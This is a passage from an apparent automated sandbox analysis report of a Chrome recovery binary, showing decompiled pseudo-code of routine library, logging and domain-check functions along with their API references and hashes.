						if(_t37 != _t67) {
							_pop(_t76);
							_v12 = _t37 + 0x10;
							_t39 = E00C93EC9(_t64, _t37 + 0x10, 0);
							_t79 = _t78 + 0xc;
							if(_t39 >= 0) {
								L13:
								if(E00C93EC9(_v12, _t64, _t76) >= 0) {
									L23:
									_t42 = E00C7CB7A(_t74,  &_v16, _t67, _t64, _a16);
									_t43 = _a4;
									 *_t43 =  *_t42;
									L24:
									return _t43;
								}
								_t77 = _a8;
								_t67 =  &_v8;
								_v8 = _t77;
								E00C72070( &_v8);
								_t45 = _v8;
								if(_t45 ==  *_t74) {
									L17:
									_t70 =  *((intOrPtr*)(_t77 + 8));
									_push(_a16);
									_push(_t70);
									_t71 = _t74;
									if( *((char*)(_t70 + 0xd)) == 0) {
										_push(_t45);
										L21:
										_push(1);
										L22:
										_push(_a4);
										E00C7CA5A(_t71);
										_t43 = _a4;
										goto L24;
									}
									_push(_t77);
									L19:
									_push(0);
									goto L22;
								}
								if(E00C93EC9(_t64, _t45 + 0x10, 0x10) >= 0) {
									goto L23;
								}
								_t77 = _a8;
								_t45 = _v8;
								goto L17;
							}
							_t67 =  &_v8;
							_v8 = _a8;
							_t53 = E00C93EC9( *((intOrPtr*)(E00C71FFC( &_v8))), _t64, 0);
							_t79 = _t79 + 0xc;
							if(_t53 >= 0) {
								goto L13;
							}
							_t54 = _v8;
							_push(_a16);
							_t72 =  *((intOrPtr*)(_t54 + 8));
							_push(_t72);
							_t71 = _t74;
							if( *((char*)(_t72 + 0xd)) == 0) {
								_push(_a8);
								goto L21;
							}
							_push(_t54);
							goto L19;
						}
						_t10 = _t67 + 8; // 0xb60f41eb
						_push(_t64);
						_push( *_t10 + 0x10);
						if(E00C93EC9() >= 0) {
							goto L23;
						}
						_push(_a16);
						_push(_t67);
						_t71 = _t74;
						_push( *((intOrPtr*)( *_t74 + 8)));
						_push(0);
						goto L22;
					}
					_push(_t37 + 0x10);
					_push(_t64);
					if(E00C93EC9() >= 0) {
						goto L23;
					}
					_push(_a16);
					_push(_t67);
					_push(_a8);
					_t71 = _t74;
					goto L21;
				}
				_push(_a16);
				E00C7CA5A(__ecx, _a4, 1, _t67, _t67);
				return _a4;
			}

0x00c7c8f5
0x00c7c8f9
0x00c7c8fc
0x00c7c901
0x00c7c91c
0x00c7c920
0x00c7c923
0x00c7c927
0x00c7c94e
0x00c7c979
0x00c7c980
0x00c7c983
0x00c7c988
0x00c7c98d
0x00c7c9ca
0x00c7c9d9
0x00c7ca2d
0x00c7ca38
0x00c7ca3f
0x00c7ca42
0x00c7ca44
0x00000000
0x00c7ca44
0x00c7c9db
0x00c7c9de
0x00c7c9e1
0x00c7c9e4
0x00c7c9e9
0x00c7c9ee
0x00c7ca09
0x00c7ca09
0x00c7ca0c
0x00c7ca0f
0x00c7ca14
0x00c7ca16
0x00c7ca1d
0x00c7ca1e
0x00c7ca1e
0x00c7ca20
0x00c7ca20
0x00c7ca23
0x00c7ca28
0x00000000
0x00c7ca28
0x00c7ca18
0x00c7ca19
0x00c7ca19
0x00000000
0x00c7ca19
0x00c7ca01
0x00000000
0x00000000
0x00c7ca03
0x00c7ca06
0x00000000
0x00c7ca06
0x00c7c992
0x00c7c995
0x00c7c9a4
0x00c7c9a9
0x00c7c9ae
0x00000000
0x00000000
0x00c7c9b0
0x00c7c9b3
0x00c7c9b6
0x00c7c9b9
0x00c7c9be
0x00c7c9c0
0x00c7c9c5
0x00000000
0x00c7c9c5
0x00c7c9c2
0x00000000
0x00c7c9c2
0x00c7c950
0x00c7c956
0x00c7c957
0x00c7c962
0x00000000
0x00000000
0x00c7c968
0x00c7c96d
0x00c7c96e
0x00c7c970
0x00c7c973
0x00000000
0x00c7c973
0x00c7c92c
0x00c7c92d
0x00c7c938
0x00000000
0x00000000
0x00c7c93e
0x00c7c941
0x00c7c942
0x00c7c945
0x00000000
0x00c7c945
0x00c7c903
0x00c7c90f
0x00000000

APIs

_memcmp.LIBVCRUNTIME ref: 00C7C92E

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 093fe16c142ff3c9d98dfb4bc9c6a0d372a06be5c7951a027dea2351222d9892
Instruction ID: 38cc5a0cf90ed0ed7dd018d7cc67ba13fb0fbc34dd96417f654836fe2e89e81f
Opcode Fuzzy Hash: 093fe16c142ff3c9d98dfb4bc9c6a0d372a06be5c7951a027dea2351222d9892
Instruction Fuzzy Hash: 55414CB1A0011ABBDF05DF65CC85EAE7BAAEF44354F14C018F909A7252E771EE50EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C819DA Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00C819DA(void* __ecx) {
				void* _t4;
				void* _t11;
				long _t25;
				void* _t28;

				if( *0xca8020 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E00C81CCE(__eflags,  *0xca8020);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00C81D09(__eflags,  *0xca8020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t28 = E00C84E20();
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00C81D09(__eflags,  *0xca8020, 0);
								} else {
									__eflags = E00C81D09(__eflags,  *0xca8020, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00C83557(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x00c819e1
0x00c819f4
0x00c819fb
0x00c819fe
0x00c81a01
0x00c81a1a
0x00c81a1a
0x00c81a03
0x00c81a03
0x00c81a05
0x00c81a0f
0x00c81a16
0x00c81a18
0x00c81a1f
0x00c81a21
0x00c81a28
0x00c81a2c
0x00c81a2e
0x00c81a42
0x00c81a42
0x00c81a4b
0x00c81a30
0x00c81a3e
0x00c81a40
0x00c81a54
0x00c81a56
0x00c81a56
0x00000000
0x00000000
0x00000000
0x00c81a40
0x00c81a59
0x00000000
0x00000000
0x00000000
0x00c81a18
0x00c81a05
0x00c81a61
0x00c81a6b
0x00c819e3
0x00c819e5
0x00c819e5

APIs

GetLastError.KERNEL32 ref: 00C819E8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C819F6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C81A0F
SetLastError.KERNEL32(00000000,?,00C819D1,00C81765), ref: 00C81A61

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ff7ea35c0531c44d925a23bd8a24df500cc13bd68fec7d734d660740bc4cc141
Instruction ID: 7c9f83f32262c2aa955940164ba439b9da31191181ebd6f8f71784ba0fa3db02
Opcode Fuzzy Hash: ff7ea35c0531c44d925a23bd8a24df500cc13bd68fec7d734d660740bc4cc141
Instruction Fuzzy Hash: 1501B53261E3115E972D36B5FC857AE26DCEB0677D728022AF924510E0FF514D0A734C

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E634 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 184
threadCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00C7E634(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				signed int _v8;
				char _v732;
				long _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				char _v996;
				char _v1000;
				char _v1252;
				char _v1508;
				char _v1512;
				intOrPtr _v1564;
				char* _v1568;
				char* _v1572;
				intOrPtr _v1576;
				char _v1588;
				intOrPtr _v1592;
				char* _v1596;
				char _v1600;
				intOrPtr _v1604;
				intOrPtr _v1616;
				signed int _v1644;
				signed int _v1656;
				char _v2368;
				intOrPtr _v2372;
				intOrPtr _v2380;
				char _v2636;
				char _v3144;
				char _v3148;
				intOrPtr _v3200;
				char* _v3204;
				char* _v3208;
				intOrPtr _v3212;
				char _v3224;
				intOrPtr _v3228;
				char* _v3232;
				char _v3236;
				void* _v3248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t75;
				char* _t93;
				char* _t98;
				signed int _t100;
				char* _t110;
				char* _t115;
				intOrPtr* _t123;
				intOrPtr* _t128;
				void* _t132;
				intOrPtr _t133;
				long* _t134;
				intOrPtr _t139;
				void* _t144;
				intOrPtr _t145;
				struct _CRITICAL_SECTION* _t147;
				void* _t150;
				char _t151;
				char _t152;
				intOrPtr _t153;
				void* _t156;
				signed int _t157;
				signed int _t159;
				signed int _t161;
				signed int _t167;
				signed int _t169;
				signed int _t172;

				_t161 = (_t159 & 0xfffffff8) - 0x644;
				_t75 =  *0xca8008; // 0x617e0cdd
				_v8 = _t75 ^ _t161;
				_t133 = _a8;
				_t145 = _a4;
				_v1604 = _a12;
				E00C7E4E6( &_v1600, _t145, _t150);
				_t151 = _v1600;
				E00C81190(_t145,  &_v1508, 0, 0x308);
				E00C79C43( &_v1508, 0x80, 0xffffffff, L"%s", _t145);
				E00C79C43( &_v1252, 0x80, 0xffffffff, L"%s", _t133);
				E00C79C43( &_v996, 0x80, 0xffffffff, L"%s", _v1604);
				_v740 = _a16;
				_v736 = 1;
				E00C81190(_t145,  &_v1588, 0, 0x50);
				E00C81190(_t145,  &_v732, 0, 0x2cc);
				_t167 = _t161 + 0x60;
				_v1596 =  &_v1588;
				_t93 =  &_v732;
				_v1592 = _t93;
				__imp__RtlCaptureContext(_t93, _t144, _t150, _t132);
				_v1592 = 0xc000000d;
				_v1572 =  &_v1512;
				_v1568 =  &_v1000;
				_v1564 = _v744;
				_push( &_v1512);
				_v1576 = 3;
				_t98 =  &_v1600;
				_push(_t98);
				if( *((intOrPtr*)(_t151 + 0xc)) == 0) {
					L15();
				} else {
					_push(GetCurrentThreadId());
					_t98 = E00C7E943(_t133, _t151);
				}
				if(_t98 == 0) {
					_t128 =  *((intOrPtr*)(_t151 + 0x80));
					if(_t128 == 0) {
						E00C83439();
					} else {
						 *_t128(_t145, _t133, _v1616, _a16, _a20);
						_t167 = _t167 + 0x14;
					}
				}
				E00C83F79(0);
				asm("int3");
				_t157 = _t167;
				_t169 = (_t167 & 0xfffffff8) - 0x640;
				_t100 =  *0xca8008; // 0x617e0cdd
				_v1644 = _t100 ^ _t169;
				E00C7E4E6( &_v3236, _t145, _t151);
				_t152 = _v3236;
				E00C81190(0,  &_v3144, 0, 0x308);
				_v2372 = 2;
				E00C81190(0,  &_v3224, 0, 0x50);
				E00C81190(0,  &_v2368, 0, 0x2cc);
				_t172 = _t169 + 0x24;
				_v3232 =  &_v3224;
				_t110 =  &_v2368;
				_v3228 = _t110;
				__imp__RtlCaptureContext(_t110, _t145, _t151, _t156);
				_v3228 = 0xc0000025;
				_v3208 =  &_v3148;
				_v3204 =  &_v2636;
				_v3200 = _v2380;
				_push( &_v3148);
				_v3212 = 3;
				_t115 =  &_v3236;
				_push(_t115);
				if( *((intOrPtr*)(_t152 + 0xc)) == 0) {
					_t139 = _t152;
					L15();
				} else {
					_push(GetCurrentThreadId());
					_t139 = _t152;
					_t115 = E00C7E943(_t133, _t139);
				}
				if(_t115 != 0) {
					L14:
					E00C83F79(0);
					asm("int3");
					_push(_t157);
					_push(_t133);
					_push(_t152);
					_t153 = _t139;
					_push(0);
					_t147 = _t153 + 0x90;
					EnterCriticalSection(_t147);
					_t134 = 0;
					__eflags =  *((intOrPtr*)(_t153 + 0x88));
					if( *((intOrPtr*)(_t153 + 0x88)) != 0) {
						 *((intOrPtr*)(_t153 + 0xb0)) = GetCurrentThreadId();
						 *(_t153 + 0xb4) = _v8;
						 *((intOrPtr*)(_t153 + 0xb8)) = _v4;
						ReleaseSemaphore( *(_t153 + 0xa8), 1, 0);
						WaitForSingleObject( *(_t153 + 0xac), 0xffffffff);
						 *((intOrPtr*)(_t153 + 0xb0)) = 0;
						 *(_t153 + 0xb4) = 0;
						 *((intOrPtr*)(_t153 + 0xb8)) = 0;
						_t134 =  *((intOrPtr*)(_t153 + 0xbc));
					}
					LeaveCriticalSection(_t147);
					return _t134;
				} else {
					_t123 =  *((intOrPtr*)(_t152 + 0x84));
					_t179 = _t123;
					if(_t123 != 0) {
						 *_t123();
						goto L14;
					} else {
						E00C7E553(_t179);
						return E00C7F35B(_v1656 ^ _t172);
					}
				}
			}

0x00c7e63a
0x00c7e640
0x00c7e647
0x00c7e656
0x00c7e65b
0x00c7e65e
0x00c7e662
0x00c7e667
0x00c7e677
0x00c7e691
0x00c7e6ae
0x00c7e6ce
0x00c7e6d9
0x00c7e6e4
0x00c7e6f4
0x00c7e70b
0x00c7e710
0x00c7e717
0x00c7e71b
0x00c7e722
0x00c7e727
0x00c7e731
0x00c7e739
0x00c7e744
0x00c7e74f
0x00c7e757
0x00c7e758
0x00c7e760
0x00c7e768
0x00c7e769
0x00c7e77d
0x00c7e76b
0x00c7e771
0x00c7e774
0x00c7e774
0x00c7e784
0x00c7e786
0x00c7e78e
0x00c7e7a3
0x00c7e790
0x00c7e79c
0x00c7e79e
0x00c7e79e
0x00c7e78e
0x00c7e7aa
0x00c7e7af
0x00c7e7b1
0x00c7e7b6
0x00c7e7bc
0x00c7e7c3
0x00c7e7d0
0x00c7e7d5
0x00c7e7e6
0x00c7e7ee
0x00c7e801
0x00c7e817
0x00c7e81c
0x00c7e823
0x00c7e827
0x00c7e82e
0x00c7e833
0x00c7e83d
0x00c7e845
0x00c7e850
0x00c7e85b
0x00c7e863
0x00c7e864
0x00c7e86c
0x00c7e870
0x00c7e874
0x00c7e886
0x00c7e888
0x00c7e876
0x00c7e87c
0x00c7e87d
0x00c7e87f
0x00c7e87f
0x00c7e88f
0x00c7e8ba
0x00c7e8bb
0x00c7e8c0
0x00c7e8c1
0x00c7e8c4
0x00c7e8c5
0x00c7e8c6
0x00c7e8c8
0x00c7e8c9
0x00c7e8d0
0x00c7e8d6
0x00c7e8d8
0x00c7e8de
0x00c7e8e7
0x00c7e8f8
0x00c7e901
0x00c7e907
0x00c7e915
0x00c7e91b
0x00c7e921
0x00c7e927
0x00c7e92d
0x00c7e92d
0x00c7e934
0x00c7e940
0x00c7e891
0x00c7e891
0x00c7e897
0x00c7e899
0x00c7e8b8
0x00000000
0x00c7e89b
0x00c7e89f
0x00c7e8b7
0x00c7e8b7
0x00c7e899

APIs

Part of subcall function 00C7E4E6: EnterCriticalSection.KERNEL32(00CA9E1C,?,?,00C7E59B), ref: 00C7E4EF
Part of subcall function 00C7E4E6: SetUnhandledExceptionFilter.KERNEL32 ref: 00C7E526

RtlCaptureContext.KERNEL32(?), ref: 00C7E727
GetCurrentThreadId.KERNEL32 ref: 00C7E76B

Part of subcall function 00C7E8C1: EnterCriticalSection.KERNEL32(?,?,?,00000001,?,00C7E610,?,00000000), ref: 00C7E8D0
Part of subcall function 00C7E8C1: GetCurrentThreadId.KERNEL32 ref: 00C7E8E0
Part of subcall function 00C7E8C1: ReleaseSemaphore.KERNEL32 ref: 00C7E907
Part of subcall function 00C7E8C1: WaitForSingleObject.KERNEL32 ref: 00C7E915
Part of subcall function 00C7E8C1: LeaveCriticalSection.KERNEL32(?,?,00C7E610,?,00000000), ref: 00C7E934

RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C7E833
GetCurrentThreadId.KERNEL32 ref: 00C7E876

Strings

%, xrefs: 00C7E83D

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CriticalCurrentSectionThread$CaptureContextEnter$ExceptionFilterLeaveObjectReleaseSemaphoreSingleUnhandledWait
String ID: %
API String ID: 4000429020-2567322570
Opcode ID: 824cfd7fdafe3ee8d6e2c95e8b31e2628a1a50409f6549c043bd2ad9043fe158
Instruction ID: 7792cd2db4e082fc4c0dcd871138edc6ba5ba13d0914eeb0dc777b7135d0324f
Opcode Fuzzy Hash: 824cfd7fdafe3ee8d6e2c95e8b31e2628a1a50409f6549c043bd2ad9043fe158
Instruction Fuzzy Hash: DD616FB1508345ABD721EF64D845B9F77ECBB88714F004A1DF9A8D7291EB30E609CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C73F04 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00C73F04(intOrPtr* __ecx, void* __edx, void* __eflags, signed int _a4, WCHAR* _a8) {
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				signed int _t32;
				signed int _t36;
				void* _t39;
				intOrPtr* _t45;
				WCHAR* _t57;
				void* _t58;

				_t58 = __eflags;
				_t54 = __edx;
				_t45 = __ecx;
				 *__ecx = 0xca3f6c;
				 *(__ecx + 4) = 0x989680;
				 *((short*)(__ecx + 8)) = 0;
				 *((char*)(__ecx + 0xa)) = _a8;
				 *((char*)(__ecx + 0xb)) = 1;
				_t25 = E00C713D8();
				_t6 = _t45 + 0xc; // 0xc
				E00C71AD8(_t6, __edx, _t25);
				_t8 = _t45 + 0x14; // 0x14
				 *((intOrPtr*)(_t45 + 0x10)) = 0;
				E00C7189E(_t8, _t54, _t58, _a4);
				 *((intOrPtr*)(_t45 + 0x18)) = 0;
				_t28 = E00C713D8();
				_t11 = _t45 + 0x1c; // 0x1c
				E00C71AD8(_t11, _t54, _t28);
				asm("sbb eax, eax");
				_t32 =  ~( *0xca9f1d & 0x000000ff) & 0x00ca9e40;
				_a4 = _t32;
				if(_t32 != 0) {
					E00C73E17(_t32, 0,  &_a8);
					_t57 = _a8;
					if( *((intOrPtr*)(_t57 - 0xc)) == 0) {
						 *(_t45 + 4) = 0x989680;
						_t36 = 1;
						__eflags = 1;
					} else {
						 *(_t45 + 4) = GetPrivateProfileIntW(L"LoggingSettings", L"MaxLogFileSize", 0x989680, _t57);
						_t36 = GetPrivateProfileIntW(L"LoggingSettings", L"LogFileWide", 1, _t57) & 0xffffff00 | _t44 != 0x00000000;
					}
					 *(_t45 + 0xb) = _t36;
					_t21 = _t45 + 0x1c; // 0x1c
					_t39 = E00C74860(_t21, _t57, _a4 + 0x54);
					_t23 = _t57 - 0x10; // -15
					E00C713C0(_t39, _t23);
				}
				return _t45;
			}

0x00c73f04
0x00c73f04
0x00c73f0b
0x00c73f0f
0x00c73f15
0x00c73f1c
0x00c73f22
0x00c73f25
0x00c73f29
0x00c73f2f
0x00c73f32
0x00c73f3c
0x00c73f3f
0x00c73f42
0x00c73f47
0x00c73f4a
0x00c73f50
0x00c73f53
0x00c73f61
0x00c73f63
0x00c73f68
0x00c73f6b
0x00c73f73
0x00c73f78
0x00c73f7e
0x00c73fb5
0x00c73fbc
0x00c73fbc
0x00c73f80
0x00c73f98
0x00c73fae
0x00c73fae
0x00c73fbd
0x00c73fc0
0x00c73fca
0x00c73fcf
0x00c73fd2
0x00c73fd2
0x00c73fdd

APIs

Part of subcall function 00C713D8: GetProcessHeap.KERNEL32 ref: 00C713E9

GetPrivateProfileIntW.KERNEL32(LoggingSettings,MaxLogFileSize,00989680,00000001), ref: 00C73F96
GetPrivateProfileIntW.KERNEL32(LoggingSettings,LogFileWide,00000001,00000001), ref: 00C73FAA

Strings

MaxLogFileSize, xrefs: 00C73F8C
LogFileWide, xrefs: 00C73FA0
LoggingSettings, xrefs: 00C73F91, 00C73FA5

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: PrivateProfile$HeapProcess
String ID: LogFileWide$LoggingSettings$MaxLogFileSize
API String ID: 3069165953-2181087832
Opcode ID: 91b96b4a0ea3d557c40f635de553189730b7ea398b4a76b7e8298d51024ad308
Instruction ID: 7e91487da8d73325ee396bf82deceb2b952d2b8bed382e62c2afdd4ea8addad6
Opcode Fuzzy Hash: 91b96b4a0ea3d557c40f635de553189730b7ea398b4a76b7e8298d51024ad308
Instruction Fuzzy Hash: D6219271515280AE8B04EF69DC929AABBE8EF51314308C1AAFC499F287D774D604DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00C73B31 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72
sleepCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00C73B31(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20) {
				char _v8;
				void* __ebp;
				void* _t20;
				void* _t25;
				void* _t31;
				void* _t34;
				void* _t46;
				void* _t50;
				WCHAR* _t52;

				_t46 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t52 = _a16;
				_t34 = __ecx;
				if(_t52 != 0 && (_a4 != 0 || _a12 <= 2)) {
					E00C71AD8( &_v8, _t46, E00C713D8());
					E00C71AD8( &_a16, _t46, E00C713D8());
					_t25 = _t34 + 0x58;
					_t50 = 1;
					while(E00C77B75(_t25, 0) == 0) {
						Sleep(0x32);
						_t50 = _t50 + 1;
						_t25 = _t34 + 0x58;
						if(_t50 <= 0x14) {
							continue;
						} else {
						}
						L8:
						if(_t50 > 0x14) {
							OutputDebugStringA("LOG_SYSTEM: Couldn\'t acquire lock - ");
							OutputDebugStringW(_t52);
							OutputDebugStringW(L"\n\r");
						}
						_t20 = E00C713C0(E00C713C0(_t31, _a16 - 0x10), _v8 - 0x10);
						goto L11;
					}
					E00C73A54(_t34, __eflags);
					_t31 =  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x58)) + 8))(_a4, _a8, _a12,  &_v8,  &_a16, _t52, _a20);
					goto L8;
				}
				L11:
				return _t20;
			}

0x00c73b31
0x00c73b34
0x00c73b35
0x00c73b38
0x00c73b3b
0x00c73b40
0x00c73b5f
0x00c73b6d
0x00c73b74
0x00c73b77
0x00c73b78
0x00c73b87
0x00c73b8d
0x00c73b8e
0x00c73b94
0x00000000
0x00000000
0x00c73b96
0x00c73bbc
0x00c73bbf
0x00c73bc6
0x00c73bd3
0x00c73bda
0x00c73bda
0x00c73bed
0x00000000
0x00c73bed
0x00c73baf
0x00c73bb9
0x00000000
0x00c73bb9
0x00c73bf2
0x00c73bf6

APIs

Sleep.KERNEL32(00000032), ref: 00C73B87
OutputDebugStringA.KERNEL32 ref: 00C73BC6
OutputDebugStringW.KERNEL32 ref: 00C73BD3
OutputDebugStringW.KERNEL32 ref: 00C73BDA

Strings

LOG_SYSTEM: Couldn't acquire lock - , xrefs: 00C73BC1

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DebugOutputString$Sleep
String ID: LOG_SYSTEM: Couldn't acquire lock -
API String ID: 3789842296-1219263422
Opcode ID: be9609c202f2a7cb5981e5a7b3800cc16faac573edcc60419b60d5aa6e30a92d
Instruction ID: 3a55f9f3a09ff334676e88c27b9bc7942c4fe8cc9761b053102347d66652cc72
Opcode Fuzzy Hash: be9609c202f2a7cb5981e5a7b3800cc16faac573edcc60419b60d5aa6e30a92d
Instruction Fuzzy Hash: 4A219375210189ABDF14EF58DD8BEEE3769EF40354B00416AFC0A97062DB709F54EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C77516 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00C77516(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t9;
				void* _t10;
				intOrPtr _t14;
				signed short _t16;
				int _t20;
				signed short* _t22;
				WCHAR* _t25;

				_push(__ecx);
				_t25 = __ecx;
				_t20 = lstrlenW(__ecx);
				_v8 = _t20;
				_t9 = lstrlenW(L".google.com");
				if(_t9 > _t20) {
					L6:
					_t10 = 0;
				} else {
					_t22 =  &((L".google.com")[_t9]);
					if(_t22 < L".google.com") {
						L5:
						_t10 = 1;
					} else {
						_t14 = _v8 + _v8 - _t22 + _t25;
						_v8 = _t14;
						while(1) {
							_t16 = CharLowerW( *(_t14 + _t22) & 0x0000ffff);
							if((_t16 & 0x0000ffff) != (CharLowerW( *_t22 & 0x0000ffff) & 0x0000ffff)) {
								goto L6;
							}
							_t14 = _v8;
							_t22 = _t22 - 2;
							if(_t22 >= L".google.com") {
								continue;
							} else {
								goto L5;
							}
							goto L7;
						}
						goto L6;
					}
				}
				L7:
				return _t10;
			}

0x00c77519
0x00c77523
0x00c77528
0x00c7752f
0x00c77532
0x00c77536
0x00c77585
0x00c77585
0x00c77538
0x00c77538
0x00c77545
0x00c77581
0x00c77581
0x00c77547
0x00c7754e
0x00c77550
0x00c77553
0x00c7755b
0x00c77571
0x00000000
0x00000000
0x00c77573
0x00c77576
0x00c7757f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7757f
0x00000000
0x00c77553
0x00c77545
0x00c77587
0x00c7758b

APIs

lstrlenW.KERNEL32 ref: 00C77526
lstrlenW.KERNEL32 ref: 00C77532
CharLowerW.USER32(?,?,00C7C2A1,?,?,?,00000000), ref: 00C7755B
CharLowerW.USER32(76C869A0,?,00C7C2A1,?,?,?,00000000), ref: 00C77565

Strings

.google.com, xrefs: 00C7752A, 00C7753F, 00C77579

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CharLowerlstrlen
String ID: .google.com
API String ID: 1209591262-3181933784
Opcode ID: 80e273f97ab9da62bc3e40393db33f048011cc5dc35dff9961632c5a51dcf090
Instruction ID: 70fe6edbfd4eed8d0379d3b4c98f697be87f39bd8e5dba641eda564ad08133fa
Opcode Fuzzy Hash: 80e273f97ab9da62bc3e40393db33f048011cc5dc35dff9961632c5a51dcf090
Instruction Fuzzy Hash: DA01A472A18628EFCF548FEEAC897BD77F9EA4630435045A7E805C3211D5B4DD016770

Uniqueness

Uniqueness Score: -1.00%

Function 00C7402F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00C7402F(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				WCHAR* _t13;
				void* _t14;
				WCHAR* _t16;
				void* _t17;
				void* _t21;
				void* _t22;

				_t21 = __edi;
